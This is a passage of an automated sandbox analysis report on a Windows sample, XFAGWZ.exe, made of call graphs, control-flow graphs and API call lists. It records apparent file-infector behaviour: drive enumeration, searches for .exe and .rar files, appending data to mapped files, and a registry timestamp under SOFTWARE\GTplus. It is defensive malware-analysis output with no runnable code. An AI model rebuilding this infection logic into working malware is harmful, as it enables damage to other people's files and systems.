6b2388 CloseHandle 1350->1351 1352 6b2391 1350->1352 1351->1352 1332 6b6076 1333 6b607b 1332->1333 1337 6b60c7 1332->1337 1335 6b60b0 VirtualAlloc 1333->1335 1333->1337 1343 6b61b2 1333->1343 1334 6b615f VirtualFree 1334->1337 1335->1337 1336 6b6198 VirtualFree 1336->1343 1337->1334 1337->1336 1338 6b60d5 VirtualAlloc 1337->1338 1338->1337 1339 6b6389 VirtualProtect 1342 6b63b7 1339->1342 1340 6b63fc VirtualProtect 1341 6b6400 1340->1341 1342->1340 1344 6b63e7 VirtualProtect 1342->1344 1343->1339 1345 6b62fb 1343->1345 1344->1340 1344->1342 1353 6b6014 1354 6b605f 1353->1354 1355 6b6035 GetModuleHandleA 1353->1355 1356 6b604d GetProcAddress 1355->1356 1357 6b6058 1356->1357 1357->1354 1357->1356 1357->1357

                            Callgraph

                            • Executed
                            • Not Executed
                            • Opacity -> Relevance
                            • Disassembly available
                            callgraph 0 Function_006B1C68 1 Function_006B1E6E 1->0 6 Function_006B2D60 1->6 7 Function_006B1AF9 1->7 14 Function_006B1DF6 1->14 19 Function_006B185B 1->19 30 Function_006B1D8A 1->30 31 Function_006B1B8A 1->31 38 Function_006B1C81 1->38 43 Function_006B2D9B 1->43 53 Function_006B1915 1->53 2 Function_006B6B63 24 Function_006B67A4 2->24 27 Function_006B69B0 2->27 28 Function_006B6834 2->28 3 Function_006B29E2 25 Function_006B28B8 3->25 4 Function_006B14E1 4->7 26 Function_006B1638 4->26 5 Function_006B2361 5->43 7->26 8 Function_006B6CF8 9 Function_006B2B7D 9->3 10 Function_006B1973 10->19 11 Function_006B6CF2 11->8 12 Function_006B2CF0 13 Function_006B6076 17 Function_006B66C8 13->17 15 Function_006B274A 15->10 15->19 16 Function_006B2C48 16->10 35 Function_006B2B8C 16->35 36 Function_006B6B02 17->36 41 Function_006B6D00 17->41 42 Function_006B6A84 17->42 18 Function_006B2845 18->15 49 Function_006B239D 18->49 51 Function_006B2692 18->51 20 Function_006B6158 20->17 21 Function_006B235D 22 Function_006B17D0 23 Function_006B65A6 25->1 25->3 25->49 25->51 26->16 26->22 39 Function_006B1581 26->39 44 Function_006B1099 26->44 46 Function_006B1718 26->46 48 Function_006B139F 26->48 29 Function_006B6734 29->36 29->41 29->42 31->19 32 Function_006B600A 33 Function_006B680F 34 Function_006B120E 35->9 35->18 36->2 37 Function_006B6001 37->32 39->19 40 Function_006B1000 40->22 41->2 41->11 41->27 42->11 42->33 44->19 44->40 45 Function_006B1319 46->12 47 Function_006B119F 48->34 48->45 48->47 49->3 50 Function_006B189D 49->50 49->53 52 Function_006B6012 54 Function_006B6014

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 101 6b29e2-6b2a34 memset wsprintfA 102 6b2a3a-6b2a86 memset lstrlen lstrcpyn strrchr 101->102 103 6b2abc-6b2b21 memset * 2 FindFirstFileA call 6b28b8 memset 101->103 102->103 105 6b2a88-6b2a98 102->105 110 6b2b61-6b2b6b FindNextFileA 103->110 105->103 107 6b2a9a-6b2aa7 lstrcmpiA 105->107 108 6b2aad-6b2aba lstrlen 107->108 109 6b2b74-6b2b7a 107->109 108->103 108->107 111 6b2b6d-6b2b6e FindClose 110->111 112 6b2b23-6b2b2a 110->112 111->109 113 6b2b4c-6b2b5c call 6b28b8 112->113 114 6b2b2c-6b2b33 112->114 113->110 114->113 115 6b2b35-6b2b4a lstrcmpiA 114->115 115->111 115->113
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                            • String ID: %s*$C:\$Documents and Settings
                            • API String ID: 2826467728-110786608
                            • Opcode ID: 97d7b3334ff41bce223e054541c7bcbd99808288a7b919ee888f4f696a3e4224
                            • Instruction ID: eab8ef9db6b2bb314f21e421140a64fd82302a2004b6fad02d84389c723a9b7b
                            • Opcode Fuzzy Hash: 97d7b3334ff41bce223e054541c7bcbd99808288a7b919ee888f4f696a3e4224
                            • Instruction Fuzzy Hash: 584184F250435AAFD760EBA0DC89DDB7BEDEF84315F040929F944C2211EA34D68887A6

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 216 6b1718-6b1733 GetSystemTimeAsFileTime 217 6b1735-6b1752 SHSetValueA 216->217 218 6b1754-6b1758 216->218 219 6b17c6-6b17cd 217->219 218->219 220 6b175a-6b1784 SHGetValueA 218->220 220->219 221 6b1786-6b17b3 call 6b2cf0 * 2 220->221 221->219 226 6b17b5 221->226 227 6b17bf 226->227 228 6b17b7-6b17bd 226->228 227->219 228->219 228->227
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B1729
                            • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 006B174C
                            • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 006B177C
                            • __aulldiv.LIBCMT ref: 006B1796
                            • __aulldiv.LIBCMT ref: 006B17A8
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: TimeValue__aulldiv$FileSystem
                            • String ID: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe$SOFTWARE\GTplus$Time
                            • API String ID: 541852442-4030926073
                            • Opcode ID: 82c415402c0ca1833f552f50dbe4bca44d8a99092c0df5f77a9b79de7e16dfc9
                            • Instruction ID: db20720fc5b2d1d3941d76bbdc6482e6e0c2a38d0bd06064257a7a265a69880c
                            • Opcode Fuzzy Hash: 82c415402c0ca1833f552f50dbe4bca44d8a99092c0df5f77a9b79de7e16dfc9
                            • Instruction Fuzzy Hash: D61133F5A40219BBDB10DB94CC95FEF7FBEEB45B14F508125F901AB280DA719A848B60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 229 6b6076-6b6079 230 6b607b-6b6080 229->230 231 6b60e0-6b60eb 229->231 233 6b6082-6b6085 230->233 234 6b60f7-6b60f8 230->234 232 6b60ee-6b60f4 231->232 235 6b60f6 232->235 233->235 238 6b6087 233->238 236 6b60fa-6b60fc call 6b66c8 234->236 237 6b60fe-6b6106 234->237 235->234 236->237 241 6b6108-6b611d 237->241 242 6b6155-6b6189 VirtualFree 237->242 238->232 239 6b6089-6b6095 238->239 243 6b60a1-6b60aa 239->243 244 6b6097-6b609f 239->244 246 6b611f-6b6121 241->246 249 6b618c-6b6192 242->249 247 6b61ba-6b61c8 243->247 248 6b60b0-6b60c1 VirtualAlloc 243->248 244->243 250 6b6123 246->250 251 6b6151-6b6154 246->251 255 6b61ca-6b61d7 247->255 256 6b6243-6b6251 247->256 253 6b60c7-6b60cf 248->253 249->253 254 6b6198-6b61b0 VirtualFree 249->254 250->251 252 6b6125-6b6128 250->252 251->242 257 6b612a-6b612e 252->257 258 6b6134-6b613b 252->258 253->249 259 6b60d5-6b60df VirtualAlloc 253->259 254->247 262 6b61b2-6b61b4 254->262 263 6b61dd-6b61e0 255->263 260 6b6253 256->260 261 6b6264-6b626f 256->261 257->258 272 6b6130-6b6132 257->272 258->272 273 6b613d-6b614f 258->273 259->231 267 6b6255-6b6258 260->267 268 6b6271-6b6276 261->268 262->247 263->256 264 6b61e2-6b61f2 263->264 271 6b61f5-6b61fe 264->271 267->261 274 6b625a-6b6262 267->274 269 6b6389-6b63b1 VirtualProtect 268->269 270 6b627c-6b6289 268->270 277 6b63b7-6b63ba 269->277 285 6b628b 270->285 286 6b6292-6b6298 270->286 275 6b620c-6b6219 271->275 276 6b6200-6b6203 271->276 272->246 273->246 274->267 281 6b6238-6b623f 275->281 279 6b621b-6b6228 276->279 280 6b6205-6b6208 276->280 282 6b63fc-6b63ff VirtualProtect 277->282 283 6b63bc-6b63c2 277->283 279->281 287 6b622a-6b6236 280->287 288 6b620a 280->288 281->271 290 6b6241 281->290 284 6b6400-6b6416 282->284 283->283 289 6b63c4 283->289 291 6b6418-6b641d 284->291 292 6b6420-6b6425 284->292 285->286 293 6b62a2-6b62ac 286->293 287->281 288->281 289->282 294 6b63c6-6b63cf 289->294 290->263 295 6b62ae 293->295 296 6b62b1-6b62c8 293->296 297 6b63d1 294->297 298 6b63d4-6b63d8 294->298 295->296 299 6b62ce-6b62d4 296->299 300 6b6373-6b6384 296->300 297->298 301 6b63da 298->301 302 6b63dd-6b63e1 298->302 303 6b62da-6b62f1 299->303 304 6b62d6-6b62d9 299->304 300->268 301->302 305 6b63e3 302->305 306 6b63e7-6b63fa VirtualProtect 302->306 308 6b62f3-6b62f9 303->308 309 6b6365-6b636e 303->309 304->303 305->306 306->277 306->282 310 6b62fb-6b630f 308->310 311 6b6314-6b6326 308->311 309->293 312 6b6426-6b64a9 310->312 313 6b6328-6b634a 311->313 314 6b634c-6b6360 311->314 323 6b64ab-6b64c0 312->323 324 6b6519-6b651c 312->324 313->309 314->312 330 6b64c2 323->330 331 6b6535-6b6537 323->331 325 6b651d-6b651e 324->325 326 6b6583-6b6587 324->326 329 6b6522-6b6533 325->329 328 6b6588-6b658b 326->328 332 6b658d-6b658f 328->332 333 6b65a1-6b65a3 328->333 329->331 336 6b64f8 330->336 337 6b64c5-6b64cd 330->337 334 6b659a 331->334 335 6b6539 331->335 338 6b6591-6b6593 332->338 341 6b659b-6b659d 334->341 339 6b653b-6b6541 335->339 340 6b65b4 335->340 344 6b64fa-6b64fe 336->344 345 6b656c-6b656f 336->345 342 6b64cf-6b64d4 337->342 343 6b6542-6b6545 337->343 338->341 346 6b6595 338->346 339->343 351 6b65be-6b65db 340->351 341->338 347 6b659f 341->347 348 6b6517-6b6518 342->348 349 6b64d6-6b64d9 342->349 350 6b654d-6b6550 343->350 352 6b6572 344->352 353 6b6500 344->353 345->352 346->334 347->328 348->324 349->350 354 6b64db-6b64f5 349->354 350->351 355 6b6552-6b6556 350->355 356 6b65dd-6b65f6 351->356 357 6b6573-6b6576 352->357 353->329 358 6b6502 353->358 354->336 359 6b6578-6b657a 355->359 360 6b6558-6b6569 355->360 361 6b65f7-6b6608 356->361 357->359 358->357 362 6b6504-6b6513 358->362 359->356 363 6b657c 359->363 360->345 362->331 364 6b6515 362->364 363->361 365 6b657e-6b657f 363->365 364->348 365->326
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 006B60BE
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006B60DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 006B6189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006B61A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: Virtual$AllocFree
                            • String ID:
                            • API String ID: 2087232378-0
                            • Opcode ID: e664bc8b812f7fe76ad42bb26cb550cd44102089072788b6eb4abeacca83f810
                            • Instruction ID: 03e06b6504c02f7b45657459d5562e3dd26fc331b31b6f88afe3ae45b81b7837
                            • Opcode Fuzzy Hash: e664bc8b812f7fe76ad42bb26cb550cd44102089072788b6eb4abeacca83f810
                            • Instruction Fuzzy Hash: 091257F25087849FDB328F24CC45BEA3BB2EF02310F1845ADE8858B293D778A991C755

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 366 6b2b8c-6b2bc6 memset GetLogicalDriveStringsA 367 6b2c09-6b2c28 WaitForMultipleObjects 366->367 368 6b2bc8-6b2bcc 366->368 371 6b2c2a-6b2c3a CreateThread 367->371 372 6b2c3c-6b2c45 367->372 369 6b2bfa-6b2c07 lstrlen 368->369 370 6b2bce-6b2bd0 368->370 369->367 369->368 370->369 373 6b2bd2-6b2bdc GetDriveTypeA 370->373 371->372 373->369 374 6b2bde-6b2be1 373->374 374->369 375 6b2be3-6b2bf6 CreateThread 374->375 375->369
                            APIs
                            • memset.MSVCRT ref: 006B2BA6
                            • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 006B2BB4
                            • GetDriveTypeA.KERNEL32(?), ref: 006B2BD3
                            • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 006B2BEE
                            • lstrlen.KERNEL32(?), ref: 006B2BFB
                            • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 006B2C16
                            • CreateThread.KERNEL32(00000000,00000000,006B2845,00000000,00000000,00000000), ref: 006B2C3A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                            • String ID:
                            • API String ID: 1073171358-0
                            • Opcode ID: 5cbf48b2db2921d8fe4b1173c43380b58cbb0bb7b61a908d7aefbe4075bfbbb4
                            • Instruction ID: 546a42e4a09a75acae6d57e39bd01836fcf2a87d7a3654fd3addd21218c15e7f
                            • Opcode Fuzzy Hash: 5cbf48b2db2921d8fe4b1173c43380b58cbb0bb7b61a908d7aefbe4075bfbbb4
                            • Instruction Fuzzy Hash: FA21D5F194015EAFE720AF649C84DEF7BAFFF04348B150229F95292251DB308D86CB60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 6b1e6e-6b1e95 call 6b2d60 3 6b1e9c-6b1eaa call 6b1df6 0->3 4 6b1e97 call 6b1d8a 0->4 8 6b2332 3->8 9 6b1eb0-6b1ed9 SetFileAttributesA CreateFileA 3->9 4->3 11 6b2338-6b233b 8->11 9->8 10 6b1edf-6b1f28 call 6b1915 SetFilePointer CreateFileMappingA MapViewOfFile 9->10 10->8 20 6b1f2e-6b1f39 10->20 13 6b233d-6b2340 UnmapViewOfFile 11->13 14 6b2346-6b2349 11->14 13->14 15 6b234b-6b234e FindCloseChangeNotification 14->15 16 6b2350-6b2354 14->16 15->16 18 6b2391-6b239a call 6b2d9b 16->18 19 6b2356-6b235b CloseHandle 16->19 19->18 20->8 22 6b1f3f-6b1f56 20->22 22->8 23 6b1f5c-6b1f64 22->23 23->8 25 6b1f6a-6b1f70 23->25 25->8 26 6b1f76-6b1f87 call 6b1c81 25->26 26->8 29 6b1f8d-6b1fa7 call 6b185b call 6b1c81 26->29 29->8 34 6b1fad-6b1fb4 29->34 35 6b1fb6-6b1fc5 call 6b1af9 34->35 36 6b2024-6b2045 34->36 35->36 44 6b1fc7-6b1fd2 35->44 36->8 37 6b204b-6b204e 36->37 39 6b2070-6b20f4 call 6b1af9 * 2 call 6b1c68 * 2 memset * 2 37->39 40 6b2050-6b2053 37->40 62 6b20f5-6b20fe 39->62 42 6b2056-6b205a 40->42 42->39 45 6b205c-6b2061 42->45 44->8 47 6b1fd8-6b1fe7 44->47 45->8 51 6b2067-6b206e 45->51 49 6b1fe9-6b1fec 47->49 50 6b1fef-6b2006 call 6b1af9 47->50 49->50 57 6b2008-6b200e call 6b1c68 50->57 58 6b2013-6b201e FlushViewOfFile 50->58 51->42 57->58 58->36 63 6b2130-6b2139 62->63 64 6b2100-6b2114 62->64 67 6b213c-6b2142 63->67 65 6b212d-6b212e 64->65 66 6b2116-6b212a 64->66 65->62 66->65 68 6b215c 67->68 69 6b2144-6b2150 67->69 70 6b215f-6b2162 68->70 71 6b2152-6b2154 69->71 72 6b2157-6b215a 69->72 73 6b2181-6b2184 70->73 74 6b2164-6b2171 70->74 71->72 72->67 77 6b218d-6b21ba call 6b1c68 73->77 78 6b2186 73->78 75 6b232a-6b232d 74->75 76 6b2177-6b217e 74->76 75->70 76->73 81 6b21bc-6b21d0 call 6b1c68 77->81 82 6b21d3-6b220b call 6b1c81 call 6b1c68 77->82 78->77 81->82 89 6b221b-6b221e 82->89 90 6b220d-6b2218 call 6b1c68 82->90 92 6b2220-6b2223 89->92 93 6b2226-6b2328 memcpy UnmapViewOfFile FindCloseChangeNotification call 6b1b8a call 6b185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 6b1915 FindCloseChangeNotification 89->93 90->89 92->93 93->11
                            APIs
                            • SetFileAttributesA.KERNEL32(?,00000080,?,006B32B0,00000164,006B2986,?), ref: 006B1EB9
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 006B1ECD
                            • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 006B1EF3
                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 006B1F07
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 006B1F1D
                            • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 006B201E
                            • memset.MSVCRT ref: 006B20D8
                            • memset.MSVCRT ref: 006B20EA
                            • memcpy.MSVCRT ref: 006B222D
                            • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B2238
                            • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B224A
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B22C6
                            • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B22CB
                            • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B22DD
                            • WriteFile.KERNEL32(000000FF,006B4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B22F7
                            • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B230D
                            • FindCloseChangeNotification.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006B2322
                            • UnmapViewOfFile.KERNEL32(?,?,006B32B0,00000164,006B2986,?), ref: 006B2340
                            • FindCloseChangeNotification.KERNEL32(?,?,006B32B0,00000164,006B2986,?), ref: 006B234E
                            • CloseHandle.KERNEL32(000000FF,?,006B32B0,00000164,006B2986,?), ref: 006B2359
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$CloseView$ChangeFindNotificationPointer$CreateUnmapWritememset$AttributesFlushHandleMappingmemcpy
                            • String ID: .@k$5@k$<@k$C@k$m@k
                            • API String ID: 307705342-1431755015
                            • Opcode ID: 8be9507370015cc43e3355804a70f31427cbdbef143b1cba93fb7ddc1001dae1
                            • Instruction ID: b6169a4e1dce6599e02d053a8554204ab90d8d98b178bf5de31c2e060a1bff7c
                            • Opcode Fuzzy Hash: 8be9507370015cc43e3355804a70f31427cbdbef143b1cba93fb7ddc1001dae1
                            • Instruction Fuzzy Hash: 50F138B1900219EFCB20DFA8D890AEDBBF6FF08314F104529E519AB661D734AD91CF54

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 117 6b1973-6b199a PathFileExistsA 118 6b19a0-6b19aa 117->118 119 6b1ac7-6b1acc 117->119 122 6b19af-6b19c2 CreateFileA 118->122 120 6b1ace 119->120 121 6b1ad0-6b1ad5 119->121 120->121 125 6b1af0-6b1af6 121->125 126 6b1ad7-6b1ad9 121->126 123 6b1a28-6b1a36 GetFileSize 122->123 124 6b19c4-6b19d3 Sleep 122->124 128 6b1a38-6b1a3b 123->128 129 6b1a87-6b1a8b 123->129 124->122 127 6b19d5-6b1a0b call 6b185b wsprintfA CopyFileA 124->127 126->125 127->123 141 6b1a0d-6b1a26 CreateFileA 127->141 128->129 131 6b1a3d-6b1a51 VirtualAlloc 128->131 132 6b1a8d-6b1a90 FindCloseChangeNotification 129->132 133 6b1a96-6b1a9a 129->133 131->129 135 6b1a53-6b1a57 131->135 132->133 136 6b1aad-6b1ab1 133->136 137 6b1a9c 133->137 142 6b1a59-6b1a6d ReadFile 135->142 143 6b1a80 135->143 139 6b1adb-6b1ae0 136->139 140 6b1ab3-6b1ab6 136->140 138 6b1aa0-6b1aa7 DeleteFileA 137->138 138->136 146 6b1ae2-6b1ae5 139->146 147 6b1ae7-6b1aec 139->147 140->119 144 6b1ab8-6b1ac1 VirtualFree 140->144 141->123 145 6b1a9e 141->145 142->129 148 6b1a6f-6b1a7e 142->148 143->129 144->119 145->138 146->147 147->125 149 6b1aee 147->149 148->142 148->143 149->125
                            APIs
                            • PathFileExistsA.SHLWAPI(\Nk`Nk,00000000,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B1992
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006B19BA
                            • Sleep.KERNEL32(00000064), ref: 006B19C6
                            • wsprintfA.USER32 ref: 006B19EC
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 006B1A00
                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006B1A1E
                            • GetFileSize.KERNEL32(?,00000000), ref: 006B1A2C
                            • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 006B1A46
                            • ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 006B1A65
                            • FindCloseChangeNotification.KERNEL32(000000FF), ref: 006B1A90
                            • DeleteFileA.KERNEL32(?), ref: 006B1AA7
                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 006B1AC1
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 006B19DB
                            • %s%.8X.data, xrefs: 006B19E6
                            • \Nk`Nk, xrefs: 006B1980
                            • C:\Users\user\AppData\Local\Temp\XFAGWZ.exe, xrefs: 006B197C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                            • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XFAGWZ.exe$\Nk`Nk
                            • API String ID: 2523042076-3118700175
                            • Opcode ID: 4bff5099bd8aa423c7e632d60bb81601fd8436390d36c623ef83f990b3b2ea96
                            • Instruction ID: d03cb41f5fe52ea9901fe57662d1d807eee2038d2e014c2dd5f370245bccb36a
                            • Opcode Fuzzy Hash: 4bff5099bd8aa423c7e632d60bb81601fd8436390d36c623ef83f990b3b2ea96
                            • Instruction Fuzzy Hash: 72513FF1A01259BFCB109F98CC94AEEBBBAEF06354F504569F515EA290D370AEC0CB50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 150 6b28b8-6b28ff memset wsprintfA 151 6b29db-6b29df 150->151 152 6b2905-6b290d 150->152 152->151 153 6b2913-6b2919 152->153 154 6b291b-6b294c memset wsprintfA call 6b29e2 153->154 155 6b2956-6b2965 strrchr 153->155 158 6b2951 154->158 155->151 157 6b2967-6b2978 lstrcmpiA 155->157 159 6b297a-6b2981 call 6b1e6e 157->159 160 6b2988-6b2992 lstrcmpiA 157->160 158->151 163 6b2986 159->163 160->151 162 6b2994-6b299b 160->162 164 6b29ad-6b29c9 strstr 162->164 165 6b299d-6b29a3 162->165 163->151 167 6b29cb-6b29d1 call 6b239d 164->167 168 6b29d3-6b29d6 call 6b2692 164->168 165->164 166 6b29a5-6b29a7 lstrcpy 165->166 166->164 167->151 168->151
                            APIs
                            • memset.MSVCRT ref: 006B28D3
                            • wsprintfA.USER32 ref: 006B28F7
                            • memset.MSVCRT ref: 006B2925
                            • wsprintfA.USER32 ref: 006B2940
                              • Part of subcall function 006B29E2: memset.MSVCRT ref: 006B2A02
                              • Part of subcall function 006B29E2: wsprintfA.USER32 ref: 006B2A1A
                              • Part of subcall function 006B29E2: memset.MSVCRT ref: 006B2A44
                              • Part of subcall function 006B29E2: lstrlen.KERNEL32(?), ref: 006B2A54
                              • Part of subcall function 006B29E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 006B2A6C
                              • Part of subcall function 006B29E2: strrchr.MSVCRT ref: 006B2A7C
                              • Part of subcall function 006B29E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 006B2A9F
                              • Part of subcall function 006B29E2: lstrlen.KERNEL32(Documents and Settings), ref: 006B2AAE
                              • Part of subcall function 006B29E2: memset.MSVCRT ref: 006B2AC6
                              • Part of subcall function 006B29E2: memset.MSVCRT ref: 006B2ADA
                              • Part of subcall function 006B29E2: FindFirstFileA.KERNEL32(?,?), ref: 006B2AEF
                              • Part of subcall function 006B29E2: memset.MSVCRT ref: 006B2B13
                            • strrchr.MSVCRT ref: 006B2959
                            • lstrcmpiA.KERNEL32(00000001,exe), ref: 006B2974
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                            • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                            • API String ID: 3004273771-3007274656
                            • Opcode ID: 89f09a5f3917293c5279b71d5985c50cab5f13121a4f4f024e6e5c22f2ff8be3
                            • Instruction ID: 3692ce43e1e962deef3f3ba0bef824e9a01d48beec66de41720b276fa6e3b7c3
                            • Opcode Fuzzy Hash: 89f09a5f3917293c5279b71d5985c50cab5f13121a4f4f024e6e5c22f2ff8be3
